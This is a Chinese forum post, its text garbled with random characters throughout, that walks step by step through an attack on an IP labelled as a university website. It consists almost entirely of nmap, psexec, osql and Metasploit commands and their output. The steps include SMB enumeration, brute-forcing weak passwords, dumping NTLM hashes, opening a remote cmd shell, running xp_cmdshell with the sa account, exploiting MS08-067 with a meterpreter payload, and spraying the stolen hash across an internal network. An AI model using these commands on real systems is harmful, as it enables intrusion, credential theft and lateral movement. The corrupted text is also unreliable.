广西师范网站http://202.103.242.241/1 Q* T. W& A6 k& w1 R$ S
0 Z1 x8 F+ W8 c# H/ z$ X6 Yroot@bt:~# nmap -sS -sV 202.103.242.241
7 S ^7 S& y: K6 m6 l0 ]2 |
& r9 d7 o1 A5 G ?/ O8 o+ |Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 21:54 CST- a( ^$ ]+ D% v; S
0 ?9 `& C4 w7 |0 l' m0 a+ f# e# DNmap scan report for bogon (202.103.242.241)
( p0 u0 u) z7 n& U8 j; j+ v$ f* Z# ]* N+ o3 f) s) M
Host is up (0.00048s latency).' F; r T+ j" E! v+ r* K5 g
7 t* e. D8 p0 Y$ X# [) Y& |Not shown: 993 closed ports
" f* v# F% `/ ?" F, S0 F( X$ g3 N( z' B' h
PORT STATE SERVICE VERSION! v7 v' u! y+ w2 A! n; T
! e! |; o: j& `& ?$ d135/tcp open mstask Microsoft mstask (task server – c:\winnt\system32\Mstask.exe)
5 u$ i$ {( X" r! u4 d" s1 B3 J9 c
$ M5 b, h& w+ @! n0 b# @1 L139/tcp open netbios-ssn
( V3 V/ A! `% q' ~' N( r+ C2 q4 }
) J; R5 ?% x5 \, _445/tcp open microsoft-ds Microsoft Windows 2000 microsoft-ds
" I" ~5 {$ f: C# j. X+ \& g( T3 C/ I4 c# g; o
1025/tcp open mstask Microsoft mstask (task server – c:\winnt\system32\Mstask.exe) C( M5 Q4 o( ^/ M
8 {2 ?! G" M. i- r- F" n b
1026/tcp open msrpc Microsoft Windows RPC
# D# t: J$ i* j, x; l2 n
/ A' l! [5 ?7 ]" U7 Z1 h6 ~3372/tcp open msdtc?
" h9 s( ?- ^: N' I5 d, |6 E+ F# f! K6 q: S7 L
3389/tcp open ms-term-serv?
$ p; `+ m- x, z( y+ V6 S0 x, Z( h$ w5 U6 Y5 d* E1 G
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :3 I; K' s1 O- \- [
SF-Port3372-TCP:V=5.59BETA1%I=7%D=2/28%Time=4F4CDC90%P=i686-pc-linux-gnu%r6 Z. f; r/ n4 h7 \
) a# s, i" @* \! m* O; A' U
SF GetRequest,6,”hO\n\x000Z”)%r(RTSPRequest,6,”hO\n\x000Z”)%r(HTTPOptions
( w# B$ o& \6 A1 W# [8 R$ u2 u( @* u+ U. y
SF:,6,”hO\n\x000Z”)%r(Help,6,”hO\n\x000Z”)%r(SSLSessionReq,6,”hO\n\x000Z”)
4 G; `7 p( L5 E1 ?. O- C, g+ I, J4 X; H; h
SF:%r(FourOhFourRequest,6,”hO\n\x000Z”)%r(LPDString,6,”hO\n\x000Z”)%r(SIPO7 T1 ?+ y8 X* s- r7 N0 k/ n
' w2 X/ n+ }6 m: K9 fSF:ptions,6,”hO\n\x000Z”);
1 A* n& z2 u; O9 a) _
$ M% l. W/ F9 M& l8 dMAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)
2 d) w9 K0 R& L
4 B$ I% D" m% `+ x" `6 EService Info: OS: Windows
3 I0 a+ b* g# j- n4 [* I
( U3 V% U x0 e5 fService detection performed. Please report any incorrect results at http://nmap.org/submit/ .
# s- B+ j) {6 a$ X( ?
) U* S9 Q$ V8 _, hNmap done: 1 IP address (1 host up) scanned in 79.12 seconds
- J2 z4 q* e) o/ g) u( T! q* k7 c2 Z0 @6 d
root@bt:/usr/local/share/nmap/scripts# ls -la | grep smb //列出扫描脚本
; [ Z9 ?8 Y5 X# r5 B0 P1 s) ` ]* E' X" p
-rw-r–r– 1 root root 44055 2011-07-09 07:36 smb-brute.nse
' v6 s4 J) Y% B' F# m7 \6 v) u* t" f( H3 h: E+ C9 _' N% g w# c
-rw-r–r– 1 root root 27691 2011-07-09 07:36 smb-check-vulns.nse4 G# k2 I2 V) S' T& _5 o' I# t* i
% B1 z6 o- u1 s3 q# e
-rw-r–r– 1 root root 4806 2011-07-09 07:36 smb-enum-domains.nse7 a f+ |: K" n- X! q* h C y
& _* D% s& d- q% L: C' o; x-rw-r–r– 1 root root 3475 2011-07-09 07:36 smb-enum-groups.nse
. W! j9 f+ y- L- g8 s
+ C! H" p: H8 s7 n: T-rw-r–r– 1 root root 7958 2011-07-09 07:36 smb-enum-processes.nse" E& n/ E$ Q I5 F2 v' n
* D; }4 s# V1 y4 N1 X" l
-rw-r–r– 1 root root 12221 2011-07-09 07:36 smb-enum-sessions.nse' S1 z7 B) [; L- |$ o# ^
# \2 _' A5 q! I! I) ^4 u$ e-rw-r–r– 1 root root 6014 2011-07-09 07:36 smb-enum-shares.nse
: w0 u) f# J. ]
# W, t* i2 g: L7 _-rw-r–r– 1 root root 12216 2011-07-09 07:36 smb-enum-users.nse
: X5 |6 S- s# v- b( j! R+ G* t9 [) E) {5 K% s" f1 q+ g3 [
-rw-r–r– 1 root root 1658 2011-07-09 07:36 smb-flood.nse* `/ R o% y& n! d
- R% A3 g! M1 n* v* P# J6 U0 U-rw-r–r– 1 root root 2906 2011-07-09 07:36 smb-os-discovery.nse( e8 @# N* `+ Q2 K5 j
% r( v3 M' p" n- s- [- F-rw-r–r– 1 root root 61005 2011-07-09 07:36 smb-psexec.nse
$ H$ A2 a0 [( P* x
1 K% N8 z% `; }! C, |. d; F-rw-r–r– 1 root root 4362 2011-07-09 07:36 smb-security-mode.nse
. ^# e) S0 m' t4 Z0 T: `: F: Z* ` }' B2 _* K* c1 [
-rw-r–r– 1 root root 2311 2011-07-09 07:36 smb-server-stats.nse' |: x' h' }2 Z+ _7 H8 w! j& Q) @1 b
! V- F4 s2 K, D% ^% {
-rw-r–r– 1 root root 13719 2011-07-09 07:36 smb-system-info.nse7 f4 B0 \- y9 J! [
: Q& R2 V' l; p* h6 ^
-rw-r–r– 1 root root 1429 2011-07-09 07:36 smbv2-enabled.nse4 S! g! b6 k* O9 F8 n0 ^; @
: [; i( U+ z" ^9 A+ Z5 [: j9 Oroot@bt:/usr/local/share/nmap/scripts# nmap –script=smb-enum-users.nse 202.103.242.241
/ j, O! w/ e5 G% |$ o' _/ `. m( w( C7 Q4 |3 N
//此乃使用脚本扫描远程机器所存在的账户名
. M0 r$ ]: S( Y0 y' g( @8 q5 k
, t6 t3 ^7 D9 ]) B/ |Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:12 CST9 h* T8 q) N- b8 k! u
: n0 I% V+ f% h; s
Nmap scan report for bogon (202.103.242.241)
R) \& e! z+ z+ z7 J
; i, h4 M6 z# |Host is up (0.00038s latency).
# B- E1 a* i# R1 H0 U
$ ]4 v; @. m( _. W+ u7 DNot shown: 993 closed ports
# a7 T5 H& ~+ u$ g% g3 d( }" T: z* N/ O9 u* K4 C% w0 K6 W
PORT STATE SERVICE
K+ i7 }3 G6 i* {+ ^& F5 Y* \0 U& S, @
135/tcp open msrpc s& S- K s- i
$ p+ U+ f" P# ]- g: ?) ^$ @139/tcp open netbios-ssn/ `" J& x2 d" U. y! T) A$ p4 X7 u5 {
/ R! W' [' z( u& V8 T# K
445/tcp open microsoft-ds
/ i* o/ c5 z; d$ Q# J# a2 k$ S0 l2 n0 [( \
1025/tcp open NFS-or-IIS3 B# [3 b4 J. d. |% I0 \! k4 W
7 U7 v" A7 M9 d4 N1026/tcp open LSA-or-nterm
8 q1 Z! z, v6 f$ z/ s
8 D, U; P/ y' u% {3372/tcp open msdtc+ M: j; D) r0 Y: |- ^" S
b1 a# h" Q- @( k+ z0 @; T) j3389/tcp open ms-term-serv
! [8 C2 T( s/ \0 w2 F% D+ N
& u( ?$ S, G: EMAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
- O3 x& A& n* X8 p& [+ j
/ B; p9 c0 `/ _4 ^' I2 _6 ]" @2 |Host script results:
$ {9 A& `( C/ K% i4 M. f
) C, S5 j: @2 H9 @| smb-enum-users:: _( p6 O! g6 P7 a8 n
$ r/ H# V, }7 e8 n, [7 J1 Y
|_ Domain: PG-F289F9A8EF3E; Users:Administrator, Guest, test, TsInternetUser //扫描结果5 e5 [7 ?6 a) U2 y1 {
* ?& }* e5 G7 A* F
Nmap done: 1 IP address (1 host up) scanned in 1.09 seconds
: j. ~- t9 H0 i1 V# D, E7 f! t- J; U+ V; Z1 o
root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-enum-shares.nse 202.103.242.241 \: K& H! k; o
5 f1 I8 D- W$ L g# j( H* h, |//查看共享+ M. U6 e6 l$ V6 ~1 e$ M$ m5 a: b
; w* X& L4 F# u
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:15 CST4 e# Q9 ]6 n7 D5 c" w% p" \
( e0 g5 W% e( {6 u# o8 [Nmap scan report for bogon (202.103.242.241)% s/ s' N+ X! O$ ^' n# B
' ^) e3 [% Q G0 E) t# R" NHost is up (0.00035s latency).
3 w- A7 @3 R' u, k9 c: o# }
. S2 P, e F, C# c: ONot shown: 993 closed ports
- t+ Q0 w) y* L A, T$ g( t1 k+ }4 S) i
PORT STATE SERVICE5 L: d+ ^9 X+ K+ @. c
- Q3 o1 s( r' O# J
135/tcp open msrpc
1 M, V/ u8 s* }+ w/ t( W5 M( n( M J. k& Y) e- s ?' n
139/tcp open netbios-ssn3 {. q) m) o" J$ ]6 O+ ^8 ^
! ^; S& S% P; E5 i! V445/tcp open microsoft-ds
' |8 g5 `; B: @) c3 y( f9 Y
. O9 ?) H/ |+ e+ G1025/tcp open NFS-or-IIS# `% G! i' v0 E' s( L# n
; ? M& A S5 ~5 ~) A
1026/tcp open LSA-or-nterm$ e- N' [# _9 J' h( j! r
. b- x% V* r% {- B( x- G( o0 U
3372/tcp open msdtc$ p; b0 s' @3 ?, d
9 |+ w! o/ S: e! r% B4 q3389/tcp open ms-term-serv9 p* M0 n/ u+ \' L# m" f
: U+ o2 t% W |+ o6 |+ d4 y" hMAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)2 h4 m( ?: z( w4 Q# ]
% z! j2 L+ r( {5 r
Host script results:
: D. {& f: u8 I2 T+ l
8 O1 R5 a2 @5 X: @| smb-enum-shares:
" b& I5 ?' x) N9 _) e- f( J5 l2 }5 i7 n8 S! a) N9 `0 c
| ADMIN$
' L* g9 @7 z _/ B1 ]. J" Y5 D/ v" t4 | V- G |# K; i% q
| Anonymous access: <none>: G/ d0 o& ]5 O
" Y1 L+ e& n# `$ N| C$
$ S( K* F$ z- b# i& g$ t
: Y7 N" C% x( q# I% R| Anonymous access: <none>
: c9 @2 h0 C8 k v5 f7 r' l2 H9 A; _' f' f; m
| IPC$, H* Y: z b: r: d: E* ` s w: W
Q7 P' J4 e7 L" }
|_ Anonymous access: READ$ `4 F- \$ n% Y+ ], F- n
* Q2 d6 w, }# ]; X* E: h
Nmap done: 1 IP address (1 host up) scanned in 1.05 seconds; L/ W5 l3 Z( R- O s$ S
- j" z7 Q4 d+ }" k4 v' a- x. s
root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-brute.nse 202.103.242.241
5 j5 X) c! Q0 l& f' d
# T( z1 S7 O; N8 |2 E# S( N( X& j; l//获取用户密码
) D; Y. [1 p5 ~- ?6 U% Q+ ^0 _9 M7 H r4 M5 H
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:17 CST
1 ?' A; Z. {6 X a H* f/ |/ _8 z2 }5 ^( `
Nmap scan report for bogon (202.103.242.2418)
! q. I% g) m. L' ^, S1 D3 C! b$ l6 c" T; B6 r' [- D8 v1 v5 V
Host is up (0.00041s latency).# \4 e2 z7 j6 F- }3 G) v2 n
O9 C4 {+ f( T z% ONot shown: 993 closed ports
- F% z& Y( W5 L$ S. L" o" ?' y- {: r0 j+ A( O9 A$ ^& I
PORT STATE SERVICE2 S' }" M" S. n+ z2 {
/ h! x9 i" p" L) @: Q135/tcp open msrpc& q/ |6 B: x6 r! H$ b& h9 J! G
8 Z9 B9 b7 {" @) z: A/ F) K139/tcp open netbios-ssn
2 C" q) R0 {! d. Q# R9 ^# S5 p5 E+ C8 C
445/tcp open microsoft-ds
5 o2 C, o/ ^! s6 |2 H$ H: \
5 c" L3 {/ b& P' X0 i1025/tcp open NFS-or-IIS+ M8 l& w C* i/ k( Z$ t
% Z4 K6 h; W2 G$ \: Y( o* U1 V }1026/tcp open LSA-or-nterm0 y& |& X& r- W
/ P% \9 Y1 ~& p% ^( E3372/tcp open msdtc
y5 e* G# d# N& ?/ G
6 g& q# z9 _( P& m4 x* y) i3389/tcp open ms-term-serv
4 x' y# m3 s6 U6 I4 I; W9 X. o' p2 Z9 y: w
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)' O3 L( ?' I R4 H: s* E
2 T3 d4 C% e, f
Host script results:7 V; i. C2 D: H$ Q5 r, y
( |# J7 u4 H* P" m/ I; g2 `0 T2 F" A
| smb-brute:
; ^' K. b2 Z/ B
& L! l* r/ C& H7 Dadministrator:<blank> => Login was successful
2 a) M2 {3 H8 g" }
d* X2 y8 o0 O' C0 K$ u8 L|_ test:123456 => Login was successful, ^- K6 s! ^" X5 y/ _* _4 I( h
0 X: G/ Y; G" I+ a* Z$ z. W4 }4 Q/ t
Nmap done: 1 IP address (1 host up) scanned in 28.22 seconds5 W( L9 p2 n: Z# ?( [% O% y
: e2 Q7 r! b! l) [$ J% xroot@bt:~# wget http://swamp.foofus.net/fizzgig/ ... -exe-only.tar.bz2//抓hash2 H& D4 f4 u. x; J6 } X5 W ?
& S9 _6 q6 }. o: proot@bt:~# tar -jxvf pwdump6-1.7.2-exe-only.tar.bz2 -C /usr/local/share/nmap/nselib/data
) i* F" v+ ` d* w$ d, j: O# K9 M% o
root@bt:/usr/local/share/nmap/scripts# wget https://svn.nmap.org/nmap-exp/dev/nmap/scripts/smb-pwdump.nse
$ h/ o# X) ?1 m5 V5 [8 T2 A0 U- v: w6 F5 p
root@bt:~# nmap –script=smb-pwdump.nse –script-args=smbuser=test,smbpass=123456 202.103.242.241 -p 135,445,139" j( y+ j: R- m; H' [! O! T- S' U
0 Q$ W' e J1 lStarting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:25 CST8 |) o; B; e# {4 x+ l0 ]( I$ s! o: H
/ s& o" }* R8 H: X5 m5 w% z
Nmap scan report for bogon (202.103.242.241)+ N' b7 B* U1 Z! Q
6 W }) S4 b9 o% b L
Host is up (0.0012s latency).$ I; U. c( @) a/ b% H/ |0 J0 h
5 N/ x; b" a5 ^. g% v
PORT STATE SERVICE: N1 B7 n1 X4 Y- D( P( J/ k: d
: v7 [: |( k4 J, ]. ?135/tcp open msrpc
# U3 }; r) M; K b. Z8 e. J4 e" k0 h0 A$ k; q9 k, Y% s
139/tcp open netbios-ssn0 G S0 X$ x( u4 ?4 D1 w
/ O5 p* C* h3 d: M" H c6 b
445/tcp open microsoft-ds
4 A9 Y3 z$ H0 d% U5 o3 {) H- m1 i$ a+ D; V' E- i% }5 W
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
" i9 n1 G9 w, x' Q) t7 B( Z
% w. m) B( T. N5 `% fHost script results:
. N% S+ f* o# u- i0 k0 H9 p8 [5 j) v+ d4 q
| smb-pwdump:
0 r5 ` m& w* @; }
- ^6 N4 ]0 B6 S" y! p| Administrator:500 => NO PASSWORD*********************:NO PASSWORD*********************
" C% x+ X! L. _$ n1 E2 E Y0 n( e2 y% I$ V4 e% q5 N a+ l
| Guest:501 => NO PASSWORD*********************:NO PASSWORD*********************
' d9 A: ]; r, T3 _- x/ _" a
6 Z/ G6 ^( Y: q- }+ t9 f/ f| test:1002 => 44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4
0 t/ t7 k3 I0 a7 F- g5 X) N5 }4 ?; r
|_TsInternetUser:1000 => A63D5FC7F284A6CC341A5A0240EF721E:262A84B3E8D4B1CC32131838448C98D2
" {8 `1 t: ~& y9 Q( v
+ _5 O/ Y2 ^2 v. ]/ G; VNmap done: 1 IP address (1 host up) scanned in 1.85 seconds n; F7 h, u) H5 z6 [
& O3 @1 ^6 \6 x/ \, RC:\Documents and Settings\Administrator\桌面>psexec.exe \\202.103.242.241 -u test //获取一个cmdshell6 W$ A6 E1 E& o5 \8 j
+ s( \" t, G3 v9 p: K-p 123456 -e cmd.exe
6 `9 I; F! `5 L; a' h$ W. g& V3 b* V. Q
PsExec v1.55 – Execute processes remotely8 n) C9 Z$ E$ C$ R: `
; z6 m0 u$ n6 O b3 g' M3 H/ t
Copyright (C) 2001-2004 Mark Russinovich
1 m# X" u( s( c/ W& @9 Y7 K5 c5 Z& A/ g- W% ?( o
Sysinternals – www.sysinternals.com
( u4 o+ H( m6 L# d* n4 ~+ Z1 A# f0 `- q
Microsoft Windows 2000 [Version 5.00.2195]
5 z1 P/ I' k1 i: p6 m1 |. ^# D- ~4 g# w
(C) 版权所有 1985-2000 Microsoft Corp.
5 k: d S. d, B, v$ Q' m! X1 @: O5 U B. h1 S0 M i s
C:\WINNT\system32>ipconfig
# I9 ?) i9 n. ^. x& `" f. i1 N. g% R( g. Y" J4 R9 q
Windows 2000 IP Configuration
1 {8 e. |+ e8 x6 X0 t, ~
1 D0 q2 s, R9 T$ \Ethernet adapter 本地连接:
7 `/ Q- } z* u
* a7 ^; T! B/ f. w+ j0 I6 V- h7 ~Connection-specific DNS Suffix . :: `4 q; L0 J1 P A% P2 i( M- p
5 M1 |2 U) e* j' m
IP Address. . . . . . . . . . . . : 202.103.242.241
- ~8 j# K l9 i$ L: y6 i0 Y
: j5 _% H; G. G6 Z( u gSubnet Mask . . . . . . . . . . . : 255.255.255.0
! c3 s' Q, Q2 h* @! {, R" D4 J# @! _1 _* [/ c) F
Default Gateway . . . . . . . . . : 202.103.1.1
' N" e9 I7 T+ a4 @( M2 p4 o2 c/ Q1 ?( v
C:\Documents and Settings\Administrator\桌面\osql>osql.exe -S 202.103.242.241 -U sa -P “123456″ -Q “exec master..xp_cmdshell 'net user' “ //远程登录sa执行命令) N5 ] p6 ~2 V! e% i% C/ D
! `! A3 E1 \+ B* y/ h# Z2 mroot@bt:/usr/local/share/nmap/scripts# nmap –script=smb-check-vulns.nse 202.103.242.241 //检测目标机器漏洞
& z" m1 C) S5 n( ~/ N3 F& E% R# J7 r* @6 n6 ~. t
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:41 CST5 H$ }* i( m$ C, y- K
+ O' T& D) h& x
Nmap scan report for bogon (202.103.242.241)
& c3 h2 V& V- a& k" M
7 L! O! v1 G' K. R, C3 XHost is up (0.00046s latency).$ P0 x7 o, [+ \6 q" ~
$ b1 J e: |& _4 A& b0 |; B( e' d* r$ d
Not shown: 993 closed ports% g1 l$ j; c# L6 S% c* [0 o
2 C+ O9 K( {( p& t% {PORT STATE SERVICE
0 _4 ^1 @" _9 `" j. C7 L! w% o; r D! X0 g: X/ ]4 C
135/tcp open msrpc
1 w. t) c( L! b }* d7 \7 q/ g @
$ C) K& Q$ { B+ g9 D) M139/tcp open netbios-ssn
B L! q& @) X) ?; t& [# @* L2 t
+ k% H7 R5 k( l! U& H- {445/tcp open microsoft-ds0 |. } C9 R% K5 d1 T) ^ L" g
" f* N+ P) F+ A" R: G7 @. m1025/tcp open NFS-or-IIS; }6 N2 k3 Y7 Q' }" N# x
" G" g( G8 U3 s. M! n) y
1026/tcp open LSA-or-nterm
7 S- t# Z: J2 E }9 ?0 `
7 W/ F& n1 H k3372/tcp open msdtc
& t" z$ V6 R8 }; n, X; o" c @7 M; J8 J7 H1 m" K' K- e+ c
3389/tcp open ms-term-serv
" r0 c! n, d% l% y/ M2 \( D+ v" z. q( |/ N
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)7 Q( O' F* g9 Z1 z6 q1 g
7 G/ E% L {+ O( k% u/ R' R, O: q
Host script results:. s* X; ?3 z4 y( s
6 R4 `2 U7 k9 k& T& h1 E| smb-check-vulns:; V, d9 ]/ ~ o8 U# p$ D
# @+ K/ ~3 r+ t|_ MS08-067: VULNERABLE
* V g* g! Z! P4 j0 B8 U3 ^7 w. w# ^
" m4 q% R M/ d; v7 i. ?. r0 RNmap done: 1 IP address (1 host up) scanned in 1.43 seconds
3 A$ q8 Q3 I0 p; _3 U5 c% i$ u# b: n
$ w4 u- ]2 ~4 T. ]: V8 }6 D$ T froot@bt:~# msfconsole //在msf上利用ms08-067漏洞对目标机器进行溢出" z' p* P! N& b2 `! h, @/ b' k- w
: k$ u3 f1 V/ q, W. U1 H
msf > search ms08
; a. a' h1 z' b/ ]2 v0 E" ?3 J- U% y: P5 N
msf > use exploit/windows/smb/ms08_067_netapi1 |5 G9 L3 \! u% p3 r
5 Z% V( l, A7 l4 h( \msf exploit(ms08_067_netapi) > show options, C, a3 L5 j2 M8 `% X
$ M& f5 m( k7 M, q
msf exploit(ms08_067_netapi) > set RHOST 202.103.242.2414 n" I$ U' ^: U* B
% S5 |* ^! y/ K4 O6 D" l9 M
msf exploit(ms08_067_netapi) > show payloads1 B5 b+ E6 A8 g V, N9 E* ]
/ ?% D; h+ M% ?$ umsf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp
: i: U/ L" p; f6 q& O. L2 Q
" S. A" u; u$ S# j9 @' Z Q% F6 nmsf exploit(ms08_067_netapi) > exploit1 {' F" m7 x$ _ B
0 H% d8 a1 n0 n$ K% v {
meterpreter >" [1 Q3 g3 e( L. o$ X
; d0 Y }" v+ ]
Background session 2? [y/N] (ctrl+z)6 L I+ [( c7 J, N# _; D' Y" c* X! J
0 M% a$ J9 q9 z- Wmsf exploit(ms08_067_netapi) > sessions -l
5 Q9 H6 ]- E+ y S* y/ E% `
* x7 M3 o9 `8 [, t) `, U1 Nroot@bt:/usr/local/share/nmap/scripts# vim usernames.txt
9 V" T+ S! h5 q2 i& p2 [1 A: q5 f/ E* e# p2 H
test
- A" d; f! P6 S' U+ v; x5 R# W+ K( h/ h2 o/ X" u( V
administrator. V( O: \0 c& G7 w' Y
* e6 a% P4 t2 I1 a4 A# Troot@bt:/usr/local/share/nmap/scripts# vim password.txt
3 r9 m% [+ X# j" b& R& o4 J* M/ P6 c; s# w* Z( J8 F5 `' ^
44EFCE164AB921CAAAD3B435B51404EE
; t- W6 D* n* `* @1 l3 r$ }
. B3 x$ s+ C4 j k4 [1 C) G" kroot@bt:/usr/local/share/nmap/scripts# nmap –script=smb-brute.nse –script-args=userdb=usernames.txt,passdb=password.txt 192.168.1.1-254
$ o+ \7 z% h( _7 d; i/ ?7 {( D& L/ q8 N) D; q
//利用用户名跟获取的hash尝试对整段内网进行登录$ f0 t0 B" B' `; z: S- Z
' q2 `0 [* w6 mNmap scan report for 192.168.1.1055 j" k/ z. b }5 D: h
( [( Y! Y4 X% v4 F( S4 IHost is up (0.00088s latency).% C* V8 k- V" N. f/ V# S& z
) ?& J) r, j3 K4 [, t& B8 B) S
Not shown: 993 closed ports6 ?- {) O- `+ p9 f
+ h6 l% ~: F. R( o; [% [
PORT STATE SERVICE
* ~# @! x+ Q7 j
' B; Q. U; X6 @8 Q6 Z- C5 Q+ O" c135/tcp open msrpc! [3 O# Z6 r2 S0 N* P0 X
2 c( a+ i P/ m/ ? }' S& L139/tcp open netbios-ssn
3 L" J7 L& q( s! C; o# l/ x
% N/ |2 e, M) W( q445/tcp open microsoft-ds
2 T. m8 W' F( [7 S3 S+ W+ {: s+ A. Z, a* O* _' ]
1025/tcp open NFS-or-IIS
3 _$ W2 v( d: F+ x) j/ X$ T, C& P1 h# e6 P9 U4 e& X% _
1026/tcp open LSA-or-nterm! \) N4 u+ _" w, H* X1 O
& g; d: \$ _- K. y5 t5 M7 \7 W
3372/tcp open msdtc
' w7 s) `& C" ?0 ]8 D! d
5 R$ u6 }# c6 t3389/tcp open ms-term-serv9 C1 y( l: x& Y0 b
# v. H% [; N) i8 o* ~; v# Z% A6 oMAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
; ]2 ?% }" l& V& F* A3 i
, Z( e# O6 q! X0 sHost script results:2 S( h1 g. _- z e
3 j; N( x; s7 r
| smb-brute:
. Z$ e" M' {" g6 c9 H' ] z
8 ] g; u1 _" ?|_ administrator:<blank> => Login was successful
/ d- N5 U4 V% c$ D3 R0 t0 R% J6 B0 Z
攻击成功,一个简单的msf+nmap攻击~~·
1 j6 _* o6 }4 X0 u# n0 ~( D) s9 B* [( H4 Y
|
发表于 2012-12-4 12:46:42
收藏
支持
反对